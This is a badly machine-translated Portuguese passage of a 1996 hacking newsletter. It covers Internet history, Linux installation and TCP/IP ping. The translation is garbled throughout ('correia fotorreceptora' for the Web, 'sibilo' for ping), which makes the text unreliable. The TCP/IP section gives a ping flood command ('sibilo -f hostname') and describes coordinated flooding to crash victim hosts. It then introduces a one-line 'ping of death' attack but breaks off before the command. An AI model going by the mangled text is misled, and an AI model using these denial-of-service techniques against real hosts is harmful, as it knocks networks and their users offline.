  • 6. faria cópias dse em o que computador estava ligada e para emitir então cópias sobre as ligações de comunicações a outros anfitriões do Internet. (Usou um erro no sendmail que permitiu o acesso à raiz, permitindo que o vírus actue como o superuser). Rapidamente a propagação exponencial deste vírus fêz o Internet desmoronar do tráfego de comunicações e do espaço que de disco amarrou acima. Então o Internet estava ainda sob alguma semelhança do controle pelo National Science Foundation e foi conectado somente a alguns mil computadores. A rede foi interrompida e todos os vírus foram removidos de seus computadores de anfitrião, e a rede foi põr então de novo na operação. Morris, entrementes, foi na cadeia. Havido algum interesse que, apesar das medidas de segurança melhoradas (por exemplo, “guarda-fogos”), alguém pode encontrar uma maneira nova de lanç um vírus que poderia outra vez interromper o Internet. Dado a perda de controle centralizado, reiniciá-la poderia ser muito mais demorado se este era acontecer outra vez. Mas restabelecendo um controle centralizado gostar hoje do que existiu na altura de “do sem-fim Morris” é provável ser impossível. Mesmo se era possível, os arquitetos de ARPANET do original estavam provavelmente correctos em sua avaliação que a rede se tornaria mais suscetível para a falha maciça um pouco do que menos se algum controle centralizado era in place. Talvez a única característica a mais significativa do Internet de hoje é esta falta do controle centralizado. Nenhuma pessoa ou organização podem agora controlar o Internet. De facto, a dificuldade do controle transformou-se uma edição assim que seu primeiro ano de operação como ARPANET. Nesse ano o email foi inventado espontâneamente por seus usuários. À surpresa de gerentes de ARPANET, pelo segundo email do ano esclareceu o volume da comunicação sobre o sistema. Porque o Internet tinha vindo ter um inteiramente autônomo, descentralizado a vida do seus próprios, em abril de 1995, o NSF parado financiando NSFNET, a espinha dorsal das comunicações das fibras ópticas que tinha dado ao mesmo tempo a NSF a tecnologia para controlar o sistema. A proliferação das ligações e de anfitriões paralelos de comunicações até lá tinha contorneado completamente toda a possibilidade de controle centralizado. Há diversas características principais do Internet: * World Wide Web -- uma rede de publicação do hypertext e agora a parte a mais em crescimento rápido do Internet. * email -- uma maneira de emitir mensagens eletrônicas * USENET -- fóruns em que os povos podem afixar e mensagens do público da vista * telnet -- uma maneira de entrar aos computadores remotos do Internet * File Transfer Protocol -- uma maneira de transferir limas dos computadores remotos do Internet * Internet Relay Chat -- conversações tempos real do texto -- usado primeiramente por cabouqueiros e por outros veteranos do Internet * Gopher -- uma maneira de catalogar e de procurarar pela informação. Isto está crescendo ràpida obsoleto. Enquanto você move os surfistas sabem, lá são dúzias de outros serviços interessantes mas menos conhecidos tais como WHOIS, dedo, sibilo etc.
  • 7. O World Wide Web O World Wide Web é a característica principal a mais nova do Internet, datando da mola de 1992. Consiste nos “Web pages,” que são como páginas em um livro, e nas ligações das palavras, das frases ou dos símbolos especialmente marcados em cada página a outros Web pages. Estas páginas e ligações criam junto o que é sabido como o “hypertext.” Esta técnica torna possível amarrar junto muitos originais diferentes que podem ser redigidos por muitos povos e ser armazenados em muitos computadores diferentes em torno do mundo em um original do hypertext. Esta técnica é baseada no padrão universal do localizador do recurso, que especific como enganchar acima com o computador e alcançar as limas dentro dela onde os dados de um Web page podem ser armazenados. Um URL é sempre do formulário http:// o mais <rest do address>, onde <rest do address> inclui um Domain Name que deva ser registado com uma organização chamada InterNIC a fim se certificar de que dois Web pages diferentes (ou os email address, ou os endereços de computador) não terminam acima ser idênticos. Este registo é uma de poucas características do controle centralizado do Internet. É aqui como o hypertext do World Wide Web trabalha. O leitor viria a uma indicação tal como “nosso serviço do caminhão do LTL das ofertas da companhia a todas as cidades principais dos E.U.” Se esta indicação no “Web page” é destacada, esse significa que um clique do rato do computador do leitor a tomará o ou a um Web page novo com detalhes. Estes podem incluir programações completas e um formulário para completar para requisitar um colector e uma entrega. Alguns Web pages oferecem mesmo maneiras de fazer pagamentos eletrônicos, geralmente através dos cartões de crédito. Entretanto, a segurança de transferências de dinheiro sobre o Internet é ainda um tema importante. Contudo apesar estar relacionados com verifiability de transacções financeiras, o comércio eletrônico sobre a correia fotorreceptora está crescendo rapidamente. Em seu segundo ano cheio de existência, 1994, somente uns $17.6 milhões nas vendas foram conduzidos sobre a correia fotorreceptora. Mas em 1995, as vendas alcangaram $400 milhões. Hoje, em 1996, a correia fotorreceptora é atolada com os locais comerciais que imploram por sua informação do cartão de crédito. Além, a correia fotorreceptora está sendo usada como uma ferramenta na distribuição de um formulário novo da moeda, conhecido como o dinheiro eletrônico. É concebível que, se o obstáculo do verifiability pode ser superado, esse dinheiro eletrônico (chamado frequentemente moeda electrónico) pode jogar um maior protagonismo na economia mundial, simplificando o comércio internacional. Pode igualmente eventualmente fazer moedas nacionais e mesmo tributação como nós a sabemos obsoleta. Os exemplos dos Web site onde um pode obter a moeda electrónico incluem o banco de Mark Twain de St Louis, MO (http://www.marktwain.com) e Digicash de Amsterdão, os Países Baixos (http://www.digicash.com). Quase a natureza do para fora--controle do Internet manifesta-se no World Wide Web. O autor de um Web page não precisa de começ a permissão ou fazer nenhum arranjo com os autores de outros Web pages a que ou desejam estabelecer as ligações. As ligações podem ser estabelecidas automaticamente simplesmente programando nos URL das ligações desejadas do Web page.
  • 8. Inversamente, a única maneira o autor de um Web page pode impedir outros povos da leitura ele ou estabelecer as ligações de hypertext a ele é setup um sistema de protecção da senha (ou não tendo as ligações de comunicações ao descanso do Internet). Um problema com o World Wide Web é como encontrar coisas nele. Apenas porque qualquer um pode enganchar um computador novo até o Internet, tão igualmente não há nenhuma autoridade central com controle ou mesmo conhecimento do que é publicado onde no World Wide Web. Ninguém necessidades de pedir a permissão de uma autoridade central colocar um Web page. Uma vez que um usuário sabe o endereço (URL) de um Web page, ou pelo menos o URL de um Web page que lig eventualmente à página desejada, a seguir é possível (contanto que as ligações de comunicações estão disponíveis) enganchar quase imediatamente acima com esta página. Por causa do valor de saber URL, há agora muitas companhias e instituições académicos que oferecem os índices procurado (situados na correia fotorreceptora) ao World Wide Web. Os programas automatizados tais como as esteiras rolantes de correia fotorreceptora procuraram a correia fotorreceptora e catalogam os URL que encontram enquanto viajam da ligação de hypertext à ligação de hypertext. Mas porque a correia fotorreceptora é constantemente crescente e em mudança, não há nenhuma maneira de criar um catálogo detalhado da correia fotorreceptora inteira. Email O email é o segundo uso o mais velho do Internet, datando do Arpanet de 1972. (O primeiro uso era permitir que os povos entrem remotamente a sua escolha de um dos quatro computadores em que Arpanet foi lanç em 1971.) Há dois usos principais do email: comunicações confidenciais, e email transmitido. Quando transmitido, o email sere para fazer anúncios (transmissão de sentido único), e para continuar as discussões entre grupos de pessoas tais como nosso cabouqueiro feliz alistam. Na modalidade da discussão de grupo, cada mensagem emitida por cada membro da lista é transmitida a todos membros restantes. Os dois tipos do programa o mais popular usados para transmitir para enviar por correio electrónico grupos de discussão são majordomo e listserv. USENET O USENET era uma conseqüência natural da lista de discussão transmitida do grupo do email. Um problema com lista do email é que não havia nenhuma forma facil para os povos novos a estes grupos se juntar lhes. Um outro problema é que como o grupo cresce, um membro pode ser inundado com dúzias ou centenas de mensagens de correio electrónico cada dia. Em 1979 estes problemas foram endereçados pelo lançamento do USENET. O USENET consiste nos grupos da notícia que continuam discussões sob a forma dos “bornes.” Ao contrário de um grupo de discussão do email, estes bornes são armazenados, tipicamente por duas semanas ou assim, esperando leitores potenciais. Porque os bornes novos são submetidos a um grupo da notícia, são transmissão a todos os anfitriões do Internet que são subscritos para carreg os grupos da notícia a que estes bornes pertencem. Com muitos programas da conexão a internet você pode ver as similaridades entre o USENET e o email. Ambos têm os encabeçamentos similares, que seguem seu movimento através da rede. Alguns programas tais como o pinho são emitidos até
  • 9. emitem a mesma mensagem simultaneamente aos email address e aos newsgroup. Todos os leitores de notícia do USENET permitem você envie por correio electrónico os autores dos bornes, e muitos igualmente permitem que você envie por correio electrónico estes bornes eles mesmos a o senhor mesmo ou a outros povos. Agora, está aqui uma vista geral rápida dos princípios que do Internet nós planeamos cobrir em diversas introduções seguintes do guia (na maior parte) ao corte inofensivo: Unix Nós discutimos os “escudos” que permitem que se escreva programas (“certificados ") que automatizar série complicada de comandos de Unix. O leitor é introduzido ao conceito dos certificados que executam o corte de funções. Nós introduzimos o Perl, que é um linguagem de programação do escudo usado para a maioria de elite de cortar certificados tais como SATAN. TCP/IP e UUCP Este capítulo cobre as ligações de comunicações que ligam junto o Internet de uma perspectiva dos cabouqueiros. A atenção extra é dada ao UUCP desde que é tão hackable. Endereços, Domain Name e routeres do Internet O leitor aprende como a informação é emitida aos lugares direitos no Internet, e como os cabouqueiros podem o fazer ir aos lugares errados! Como olhar acima os anfitriões do UUCP (que não estão sob o Domain Name System) é incluída. Fundamentos do corte da elite: Portos, pacotes e permissões da lima Esta secção deixa os génios do corte sério fora do frasco. Oferece uma série de exercícios em que o leitor pode apreciar aceder a quase todo o anfitrião aleatòria escolhido do Internet. De facto, para o fim do capítulo o leitor terá tido a possibilidade praticar diversas técnicas dúzia para ganhar a entrada aos computadores de outros povos. Contudo estes cortes que nós ensinamos são 100% legal! _______________________________________________________ Querer subscrever a esta lista? O email hacker@techbroker.com com a mensagem “subscreve o happyhacker.” Querer compartilhar de algum stuph do kewl com a lista feliz do cabouqueiro? Emitir suas mensagens a hacker@techbroker.com. Para emitir-me o email confidencial (por favor, nenhuns exames das actividades ilegais) usar cmeinel@techbroker.com. Dirigir por favor flamas ao colaborador/null@techbroker.com. Corte feliz! Direitos reservados Carolyn 1996 P. Meinel. Você pode enviar o GUIA (na maior parte) AO CORTE INOFENSIVO contanto que você deixar esta observação na extremidade. ______________________________________________________ ______________________________________ GUIA (na maior parte) AO CORTE INOFENSIVO Vol. 2 número 2 Linux! ______________________________________ Unix transformou-se o sistema de exploração do primo do Internet. De facto, Unix é o sistema de exploração o mais amplamente utilizado no mundo entre computadores com mais poder do que PCes.
  • 10. Verdadeiro, Windows NT está vindo acima de rápido como um sistema de exploração do Internet da terra comum, e é o carrinho do sooo maravilhosamente em que olha como ele poderia assentar bem no favorito do número um a se rachar. Mas hoje Unix em todos seus sabores maravilhosos ainda é o sistema de exploração a saber verdadeiramente a fim ser um cabouqueiro da elite. Nós temos supor até agora que você tem using um cliente de escudo que você começ através de seu Internet Service Provider. Um cliente de escudo permite que você dê comandos de Unix em um de computadores do seu ISP. Mas você não precisa de depender de seu ISP para uma máquina que o deixe jogar com Unix. Você pode dirigir Unix em seu próprio computador e com um SLIP ou um PPP a conexão seja conectada directamente ao Internet. *********************** Nota do Newbie: As conexões da linha Internet Protocol de série e do Point-to-Point Protocol (PPP) dão-lhe um endereço provisório do Internet Protocol que permita que você seja enganchado directamente ao Internet. Você tem que usar conexões do SLIP ou do PPP para conseguir usar um web browser que lhe dê retratos preferivelmente no texto somente. Assim se você pode ver retratos na correia fotorreceptora, você já tem um destes disponíveis a você. A vantagem de usar uma destas conexões directas para suas actividades de corte é que você não sairá atrás de uma lima de registro do escudo para que o sysadmin do seu ISP pore sobre. Mesmo se você não está quebrando a lei, uma lima de registro do escudo que mostras você que faz lotes do stuph do cabouqueiro pode ser bastante para que alguns sysadmins fechem sumària seu cliente. ******************** Que é o melhor tipo do computador para dirigir sobre Unix? A menos que você for um cabouqueiro rico que não pense nada de comprar uma estação de trabalho de Sun SPARC, você fará provavelmente melhor com alguma sorte do PC. Há as variações quase incontáveis de Unix que funcionam em PCes, e de alguns para Mac. A maioria deles estão livres para transferência, ou barata disponível nos CD-ROMs. As três variações as mais comuns de Unix que funcionam em PCes são solaris, FreeBSD e linux de Sun. Custos dos solaris em torno de $700. Bastante dito. FreeBSD é realmente, realmente bom. Mas você con't encontra muitos manuais ou newsgroup que cobrem FreeBSD. O linux, entretanto, tem a vantagem de estar disponível em muitas variações (assim que em você podem ter o divertimento programas misturar e combinar das ofertas diferentes do linux). Mais importante ainda, o linux é suportado por muitos manuais, grupos da notícia, lista do correio e Web site. Se você tem amigos do cabouqueiro em sua área, a maioria deles provavelmente linux do uso e podem ajudá-lo para fora. ********************* Nota histórica: O linux foi criado em 1991 por um grupo conduzido por Linus Torvalds da universidade de Helsínquia. O linux é com direitos de autor sob a licença do general público do GNU. Sob este acordo, o linux pode ser redistribuído a qualquer um junto com o código fonte. Qualquer um pode vender toda a variação do linux e modificá-la e repackage a. Mas mesmo se alguém modifica o código fonte ele ou não pode reivindicar direitos reservados para qualquer coisa criado do linux. Qualquer um que vende uma versão modificada do linux deve fornecer o
  • 11. código fonte aos compradores e permitir que reúso o em seus produtos comerciais sem taxas de licenciamento de carregamento. Este arranjo é sabido como um “copyleft.” Sob este arranjo os criadores originais do linux não recebem nenhuma taxa licenciar ou de shareware. Linus Torvalds e muito outro que contribuíram ao linux fêz assim da alegria da programação e de um sentido da comunidade com todos nós que usará esperançosamente o linux no espírito do corte do bom rapaz. Linux de Viva! Viva Torvalds! ********************** O linux consiste no sistema de exploração próprio (chamado a “semente”) mais um jogo de programas associados. A semente, como todos os tipos de Unix, é uma multitarefa, sistema de exploração multi-user. Embora use uma estrutura de lima diferente, e daqui não seja directamente compatível com DOS e Windows, é tão flexível que muito os programas do DOS e de Windows puderem ser funcionados quando no linux. Assim um usuário de poder quererá provavelmente carreg acima no linux e então poder funcionar o DOS e os programas de Windows do linux. Os programas associados que vêm com a maioria de distribuições do linux podem incluir: * um programa do escudo (Bourne outra vez Shell -- FESTANÇA -- é o mais comum); * compiladores para linguagens de programação tais como Fortran-77 (meu favorito!), C, C++, Pascal, LISP, Modula-2, Ada, básico (a melhor língua para um novato), e Smalltalk.; * X (chamado às vezes X-janelas), uma interface de utilizador gráfica * programas de serviço público tais como o pinho do leitor do email (meu favorito) e o olmo Cobrir dez razões instalar o linux em seu PC: o linux 1.When outlawed, simplesmente os fora da lei possuirão o linux. Ao instalar o linux, é tanto divertimento para funcionar o fdisk sem suportar primeiramente. as flamas que 3.The você começ de fazer perguntas em newsgroup do linux são de um mais de alta qualidade do que as flamas você começ afixando a alt.sex.bestiality. 4. Não importa o que o sabor do linux você instala, você encontrará que amanhã havia distante mais ersion que 3l1te você deve ter começ preferivelmente. 5.People que usa o DEB ou solaris livres não fará o divertimento de você. Oferecerão sua simpatia preferivelmente. 6.At o engodo seguinte de Def você poderá dizer que o stuph como “tão então mim su-ed a seu cliente e grepped todas suas limas para “o kissyface”.” Oops, grepping limas do outro pessoa é um no-no, esquecer que eu o sugeri nunca. ressaca 7.Port na privacidade. palavra 8.One: façanhas. o linux 9.Installing em seu PC do escritório é como ser um trabalhador postal e trazer um Uzi para trabalhar. 10.But - - se você instala o linux em seu computador de escritório, você dirige não terá um indício o que esse significa.
  • 12. Que tipos de linux trabalham melhor? Depende do que você quer realmente. Red Hat Linux é famoso para ser o mais fácil à instalação. O jogo do CD-ROM do linux 3.0 de Walnut Creek é igualmente realmente fácil de instalar -- para o linux, isso é! Minha aproximação foi começ lotes de versões do linux e misturar e combinar o melhor de cada distribuição. Eu gosto da versão de Walnut Creek melhor porque com minha ferragem do tipo X, sua característica do autodetection era um life-saver. INSTALAR O LINUX não é para o fraco do coração! Diversas pontas para a instalação da sobrevivência são: Embora você na teoria possa funcionar o linux em uns 286 com o RAM de 4 MB e duas movimentações flexíveis, é *much* mais fácil com uns 486 ou acima com o RAM de 8 MB, o espaço de um disco rígido do CD-ROM, e pelo menos dos 200 MB livre. Saber tanto quanto possível sobre que tipo de placa de mãe, de modem, de disco rígido, de cartão do CD-ROM, e o video você tem. Se você tem alguma documentação para estes, tê-los na mão a prover durante a instalação. Trabalha melhor para usar a ferragem que é nome-tipo e um tanto expirado em seu computador. Porque o linux é freeware, não oferece excitadores de dispositivo para toda a ferragem a mais atrasada. E se sua ferragem é como minhas -- lotes do stuph do tipo X e do EL Cheapo, você pode tomar um tempo longo que experimenta com que excitadores trabalharão. Antes da instalação do começo, suportar seu disco rígido! Na teoria você pode instalar o linux sem prejudicar suas limas de DOS/Windows. Mas nós somos tudo humanos, especialmente se seguindo o conselho do ponto 7). Começ mais de uma distribuição do linux. A primeira vez que eu instalei com sucesso o linux, eu bati finalmente em algo que trabalhou usando o disco de carregador de uma distribuição com o CD-ROM para outra. Em todo caso, cada distribuição do linux teve programas de serviço público diferentes, emuladores do sistema de exploração, compiladores e mais. Adicioná-los todos a seu sistema e você setup para tornar-se além da elite. Comprar um livro ou dois ou três no linux. Eu não gostei de alguns deles! Mas são melhores do que nada. A maioria de livros no linux vêm com um ou dois CD-ROMs que podem ser usados para instalar o linux. Mas eu encontrei que o que estava nos livros não coincidiu exactamente com o o que estava nos CD-ROMs. Eu recomendo beber ao instalar. Não pode fazer a eliminação de erros ir mais rapidamente, mas pelo menos você não se importará como duramente é. Agora eu posso quase garantir aquele mesmo seguinte todas estas 6 partes de conselho, você ainda terei problemas instalar o linux. Oh, eu tenho 7 advisories acima lá? Esquecer o número 7. Mas ser do bom elogio. Desde que todos mais igualmente sofre poderosa ao instalar e ao usar o linux, o Internet tem uma riqueza incrível dos recursos para o linux - desafiado. Se você é alérgico à obtenção inflamado, você pode começar com Web site da sustentação do linux. O melhor que eu encontrei é http://sunsite.unc.edu:/pub/Linux/. Inclui a lista freqüentemente pedida das perguntas do linux (FAQ), disponível de sunsite.unc.edu:/pub/Linux/docs/FAQ.
  • 13. No diretório /pub/Linux/docs em sunsite.unc.edu você encontrará um número outros de originais sobre o linux, including o linux INFO-SHEET e META-FAQ, O arquivo do linux HOWTO está no Web site de sunsite.unc.edu em: /pub/Linux/docs/HOWTO. O diretório /pub/Linux/docs/LDP contem o jogo actual de manuais de LDP. Você pode começ do “a instalação linux e a obtenção começado” de sunsite.unc.edu em /pub/Linux/docs/LDP/install-guide. A lima de README lá descreve como você pode requisitar uma cópia impressa do livro do mesmo nome (aproximadamente 180 páginas). Agora se você não se ocupa começ inflamado, você pode querer afixar perguntas ao número surpreendente de grupos da notícia de USENET que cobrem o linux. Estes incluem: benefícios de comp.os.linux.advocacy do linux comparados sementes do linux de comp.os.linux.development.system, excitadores de dispositivo usuários do sistema da janela do linux X de comp.os.linux.x aplicações do linux da escrita de comp.os.linux.development.apps compatibilidade da ferragem de comp.os.linux.hardware a instalação do linux de comp.os.linux.setup comp.os.linux.net que trabalha trabalhos em rede e comunicações FAQ de comp.os.linux.answers, Como-A, READMEs, etc. linux.redhat.misc uso comp.os.linux.* de alt.os.linux preferivelmente ajudas da universidade do USENET de alt.uu.com p.os.linux.questions você anúncios de comp.os.linux.announce importantes para o linux tópicos Linux-específicos de comp.os.linux.misc Querer seu linux livre? Tobin Fricke indic que “as cópias livres dos CD-ROMs do linux estão disponíveis a sustentação do linux & o Web site CD de Givaway em http://emile.math.ucsb.edu:8000/giveaway.html. Este é um projecto onde os povos doem o CD do linux que não precisam mais. O projecto foi semeado pelos laboratórios de Linux Sistema, que doaram 800 Cd do linux inicialmente! Recordar por favor doar seu CD do linux quando você é feito com eles. Se você vive perto de uma reunião de troca do computador, da fritada, do Microcenter, ou do outro tal lugar, procurar o CD do linux lá. Estão geralmente sob $20, que é um investimento excelente. Eu gosto pessoal do recurso do colaborador do linux por Infomagic, que é agora até um jogo do CD sete, mim acredito, que inclui todas as distribuições principais do linux (Slackware, Redhat, Debian, linux para que o alfa do DEC nomeie alguns) mais espelhos de tsx11.mit.edu e de sunsite.unc.edu/pub/linux mais muito mais. Você deve igualmente visitar a página MARAVILHOSA do linux em http://sunsite.unc.edu/linux, que tem toneladas de informação, assim como http://www.linux.org/. Você pôde igualmente querer verific para fora http://www.redhat.com/ e http://www.caldera.com/ para mais informação nas versões comerciais do linux (que são ainda livremente GNU inferior disponível).“ Como sobre a segurança do linux? Sim, o linux, como cada sistema de exploração, é imperfeito. Eminente hackable, se você quer realmente saber. Assim se você quer encontrar como fixar seu sistema do linux, ou se você vier através de um de muitos ISPs que usam o linux e o querem ir explorar (os oops, esquecem I
  • 14. escreveu que), é aqui onde você pode ir para a informação: ftp://info.cert.org/pub/cert_advisories/CA-94:01.network.monitoring.attacks ftp://info.cert.org/pub/tech_tips/root_compromise http://bach.cis.temple.edu/linux/linux-security/ http://www.geek-girl.com/bugtraq/ Há igualmente uma ajuda para usuários do linux no Internet Relay Chat. Ben (cyberkid@usa.net) hospeda uma canaleta chamada #LinuxHelp no usuário do IRC de Undernet. Último mas não de menor importância, se você quer fazer perguntas do linux na lista feliz do cabouqueiro, você é bem-vindo. Nós podemos ser os cegos conduzindo as cortinas, mas que os pedaços! ______________________________________ Direitos reservados Carolyn 1996 P. Meinel. Você pode enviar o GUIA (na maior parte) AO CORTE INOFENSIVO contanto que você deixar esta observação na extremidade. ______________________________________ __________________________________________________________ GUIA (na maior parte) AO CORTE INOFENSIVO Vol. 2 número 3 Introdução ao TCP/IP. Isso significa pacotes! Datagramas! Sibilar a negação de tamanho grande do pacote da façanha do serviço explicada. Mas este corte é muito menos na maior parte inofensivo do que a maioria. Não tentar isto em casa… __________________________________________________________ Se você estêve na lista feliz do cabouqueiro para por algum tempo, você tem começ alguns artigos enviados da lista de Bugtraq em uma façanha nova do pacote do sibilo. Agora se isto tem soado como o jargão a você, relaxar. É realmente muito simples. De facto, é tão simples que se você usa Windows 95, antes que você termina este artigo você saberá um simples, a um-linha comando que você poderia usar para deixar de funcionar muitos anfitriões e routeres do Internet. ************************************************* VOCÊ PODE IR ENCARCERAR O AVISO: Esta vez eu não estou indo implorar os tipos maus do gênio do presunçoso nesta lista para ser virtuoso e resistir a tentação empregar mal a informação que eu estou a ponto dos dar. Ver se eu me importo! Se um daqueles indivíduos começ milhares deixando de funcionar travados de anfitriões e de routeres do Internet, não somente irã0 encarcerar e começ uma multa grande. Nós todos pensá-lo-emos ou é um dork. Esta façanha é um básico, um-linha comando de Windows 95. Yeah, o sistema de exploração que é projectado para parvos à nora. Tão não há nada elite sobre este corte. O que é a elite está podendo thwart este ataque. ************************************************** ************************************************** NOTA DO NEWBIE: Se os pacotes, as datagramas, e o TCP/IP não são exactamente seus camaradas de peito ainda, acreditar-me, você precisam de
  • 15. conseguir realmente na cama com eles a fim chamar-se um cabouqueiro. Pendurar assim dentro aqui para algum material técnico. Quando nós somos feitos, você terá a satisfação de conhecê-lo poderia wreak o havoc no Internet, mas é demasiado elite a fazer assim. Um pacote é uma maneira de emitir electronicamente a informação que mantem para fora erros. A idéia é que nenhuma tecnologia de transmissão é perfeita. Você jogou nunca o jogo “telefone”? Você começ dúzia ou assim que um pessoa em um círculo e na primeira pessoa sussurra uma mensagem ao segundo. Algo como “o bolo é o mais baixo formulário do trigo.” A segunda pessoa sussurra ao terço, “um vagabundo é o mais baixo formulário do engano.” O terço sussurra, “rum é o mais baixo formulário de beber.“E assim por diante. É realmente divertimento para encontrar como distante a mensagem pode se transformar enquanto circunda o círculo. Mas quando, por exemplo, você começ o email, você preferiria que não está sujado acima. Assim o computador que emite o email quebra-o acima nas partes pequenas chamadas datagramas. Então envolve as coisas em torno de cada datagrama que dizem que computador que precisa de ir a, de onde veio, e essa verificação se a datagrama pôde ter sido truncada. Estes envolvidos acima dos pacotes da datagrama são chamados “pacotes.” Agora se o computador que emite o email a você era empacotar uma mensagem realmente longa em apenas um pacote, as possibilidades são consideravelmente elevadas que começ sujado acima quando em sua maneira ao outro computador. Burps do bocado. Assim quando o computador de recepção verific o pacote e encontrar que começ sujado acima, ele jogá-lo-á afastado e di-lo-á o outro computador para emiti-lo outra vez. Poderia tomar um tempo longo até que este pacote gigante começ com intact. Mas se a mensagem se quebra em muitas partes pequenas e se é envolvida acima em grupos dos pacotes, a maioria deles serão bons e o computador de recepção mantê-los-á. Dirá então o computador de emissão para retransmitir apenas os pacotes que sujaram acima. Então quando todas as partes começ finalmente lá, o computador de recepção une-os na ordem e no lo direitos e behold, lá é-o o email completo, sem erros. O TCP/IP representa o Transmission Control Protocol/Internet Protocol. Diz os computadores que são enganchados até o Internet como empacotar acima das mensagens em pacotes e como ler pacotes estes pacotes de outros computadores. O sibilo usa o TCP/IP para fazer seus pacotes. ********************************************** O “sibilo” é um comando que emita um calibre de lâminas para fora de seu computador a um outro computador para considerar se é girado sobre e enganchado à mesma rede que você é sobre. No Internet há uns dez milhão computadores que você pode sibilar. O sibilo é um comando que você pode dar, por exemplo, sistemas de exploração de Unix, de Windows 95 e de Windows NT. É parte do Internet Control Message Protocol, que é usado para pesquisar defeitos redes do TCP/IP. O que faz é diz um computador remoto para ecoar para trás um sibilo. Assim se você começ seu sibilo
  • 16. suportar, você sabem que o computador está vivo. Além disso, alguns formulários do comando de sibilo igualmente dir-lhe-ão quanto tempo toma para que uma mensagem saia a esse computador e volte outra vez. Mas como seu computador sabe que o sibilo que apenas mandou ecoado realmente para trás do computador alvejado? A datagrama é a resposta. O sibilo mandou uma datagrama. Se o sibilo de retorno prende esta mesma datagrama, você sabe que era seu sibilo que apenas ecoou para trás. O formato básico deste comando é simplesmente: hostname do sibilo onde o “hostname” é o internet address do computador você quer verific para fora. Quando eu dou este comando da liberação 4.1 Unix de Sun, eu começ a resposta “hostname estou vivo.” ************************************** TIP TÉCNICO: Por causa dos poderes destrutivos do sibilo, muitos provedores de serviços do Internet escondem o programa do sibilo em seus clientes de escudo onde os newbies à nora não podem começ suas mãos nele. Se seu cliente de escudo diz o “comando não encontrado” quando você incorpora o comando de sibilo, tentar: hostname de /usr/etc/ping Se isto não trabalha, ou tentar o comando “whereis sibilam” ou queixar-se à sustentação de tecnologia do seu ISP. Podem ddiabled o sibilo para usuários ordinários, mas se você convence a sustentação de tecnologia você são um bom cidadão que do Internet podem o deixar a usar. *************************************** **************************************** NOTA DO NEWBIE: Você diz que você não pode encontrar uma maneira de sibilar de seu serviço online? Isso pode ser porque você não tem um cliente de escudo. Mas há uma coisa que você precisa realmente a fim cortar: UM CLIENTE DE SHELL!!!! Os cabouqueiros da razão fazem o divertimento dos povos com clientes de America Online são porque esse ISP não dá para fora clientes de escudo. Isto é porque America Online o quer ser bons meninos e meninas e não corte! De “um cliente escudo” é um cliente do Internet em que seu computador se transforma um terminal de um de computadores de anfitrião do seu ISP. Uma vez que você está no “escudo” você pode dar comandos ao sistema de exploração (que é geralmente Unix) apenas como você estavam sentando-se lá no console de um de anfitriões do seu ISP. Você pode já ter um cliente de escudo mas apenas não saber entrar-lhe. Chamar a sustentação de tecnologia com seu ISP para encontrar se você tem um, e como começ nele. *************************************** Há todas as sortes de variações extravagantes no comando de sibilo. E, suposição o que, sempre que há um comando que você entreg o Internet que tem lotes das variações, você pode apenas sobre a contagem lá em ser algo hackable dentro lá. Muhahaha! O sibilo da inundação é um exemplo simples. Se seu sistema de exploração o deixará começ afastado com doação do comando:
  • 17. - > sibilo - hostname de f manda uma inundação verídico dos sibilos, tão rapidamente como o computador central do seu ISP pode os fazer. Isto mantem o anfitrião que você alvejou a parte traseira de eco tão ocupada seus sibilos que pode fazer pouco mais. Igualmente põr uma carga pesada sobre a rede. Os cabouqueiros com nível de habilidade primitivos às vezes reunirão e usarão diversos de seus computadores imediatamente para sibilar simultaneamente o computador de anfitrião do Internet de alguma vítima. Isto manterá geralmente o computador da vítima demasiado ocupado para fazer qualquer outra coisa. Pode mesmo deixar de funcionar. Entretanto, o para baixo lateral (do ponto de vista dos atacantes) é que mantem os computadores dos atacantes amarrados acima, demasiado. ************************************** NOTA DO NETIQUETTE: A inundação que sibila um computador é extremamente rude. Começ travado fazendo isto e você será afortunado se o mais mau que acontece é seu serviço online que o fornecedor fecha seu cliente. Fazer isto a um cabouqueiro sério e você pode precisar uma transplantação da identidade. Se você começar um tipo do sibilo da inundação de acidentalmente, você pode fechá-lo fora mantendo a chave de controle e pressionando “c” (Controlo-C). ************************************** ************************************* TIP MAU DO GÊNIO: Sibilo você mesmo! Se você está usando alguma sorte de Unix, seu sistema de exploração deixá-lo-á usar seu computador para fazer apenas sobre qualquer coisa a se que pode fazer a outros computadores. O endereço de rede que o toma de volta a seu próprio computador de anfitrião são o localhost (ou 127.0.0.1). Está aqui um exemplo de como eu uso o localhost: localhost do >telnet do <slug> [65] - 127.0.0.1 de tentativa… Conectado ao localhost. O carácter de escape é “^]”. SunOS UNIX início de uma sessão: Ver, mim são de volta à seqüência do início de uma sessão para o computador nomeado “slug” toda sobre outra vez. Agora eu sibilo-me: localhost do <llama> [68] - >/usr/etc/ping o localhost está vivo Isto dá o mesmo resultado como se eu devia comandar: lama do <llama> [69] - >/usr/etc/ping llama.swcp.com está vivo **************************************** *****************************************
  • 18. TIP DE MUHAHAHA: Querer arrancar alguém chain? Dizer-lhe ao ftp a 127.0.0.1 e ao início de uma sessão using seus próprios nome e senha de usuário para o warez do kewl! Meu ex-husband Keith Henson fêz aquele à igreja de Scientology. O ftp-ed das rodas denteadas a 127.0.0.1 e descoberto todas suas escrituras com direitos de autor. Elas sups que isto estava no computador de Keith, não dele. Eram *so* sure que teve suas escrituras que lhe tomaram à corte. O juiz, quando realizou que estavam dando laços simplesmente - para trás a seu próprio computador, riu-os literalmente fora da corte. Para um transcrito ou uma cassete áudio divertida desta sessão do tribunal infame, email hkhenson@cup.portal.com. Aquele é email address de Keith. Meu chapéu está a um cabouqueiro magnífico! ******************************************* Entretanto, a façanha que de tamanho grande do pacote do sibilo você está a ponto de aprender fará ainda mais dano a alguns anfitriões do que um grupo de conspiradores do sibilo da inundação. E fá-la-á sem amarrar acima do computador dos atacantes para mais por muito tempo do que o segundo onde rachado toma para mandar apenas um sibilo. A maneira a mais fácil de fazer este corte é funcionar Windows 95. Não a têm? Você pode geralmente encontrar uma loja do EL Cheapo que lhea venda para $99. Para fazer isto, primeira instalação seu sistema de Windows 95 de modo que você possa fazer uma conexão do PPP ou do SLIP com o Internet using o programa marcação telefónica dos trabalhos em rede sob meu ícone do computador. Você pode precisar alguma ajuda de sua sustentação de tecnologia do ISP em configurar isto. Você deve fazê-la esta maneira ou este corte não trabalhará. Seu *definitely* do dialer de America Online não trabalhará. ************************************ NOTA DO NEWBIE: Se sua conexão a internet permite que você funcione um web browser que mostre retratos, você pode usar esse número marcação telefónica com seu programa marcação telefónica dos trabalhos em rede 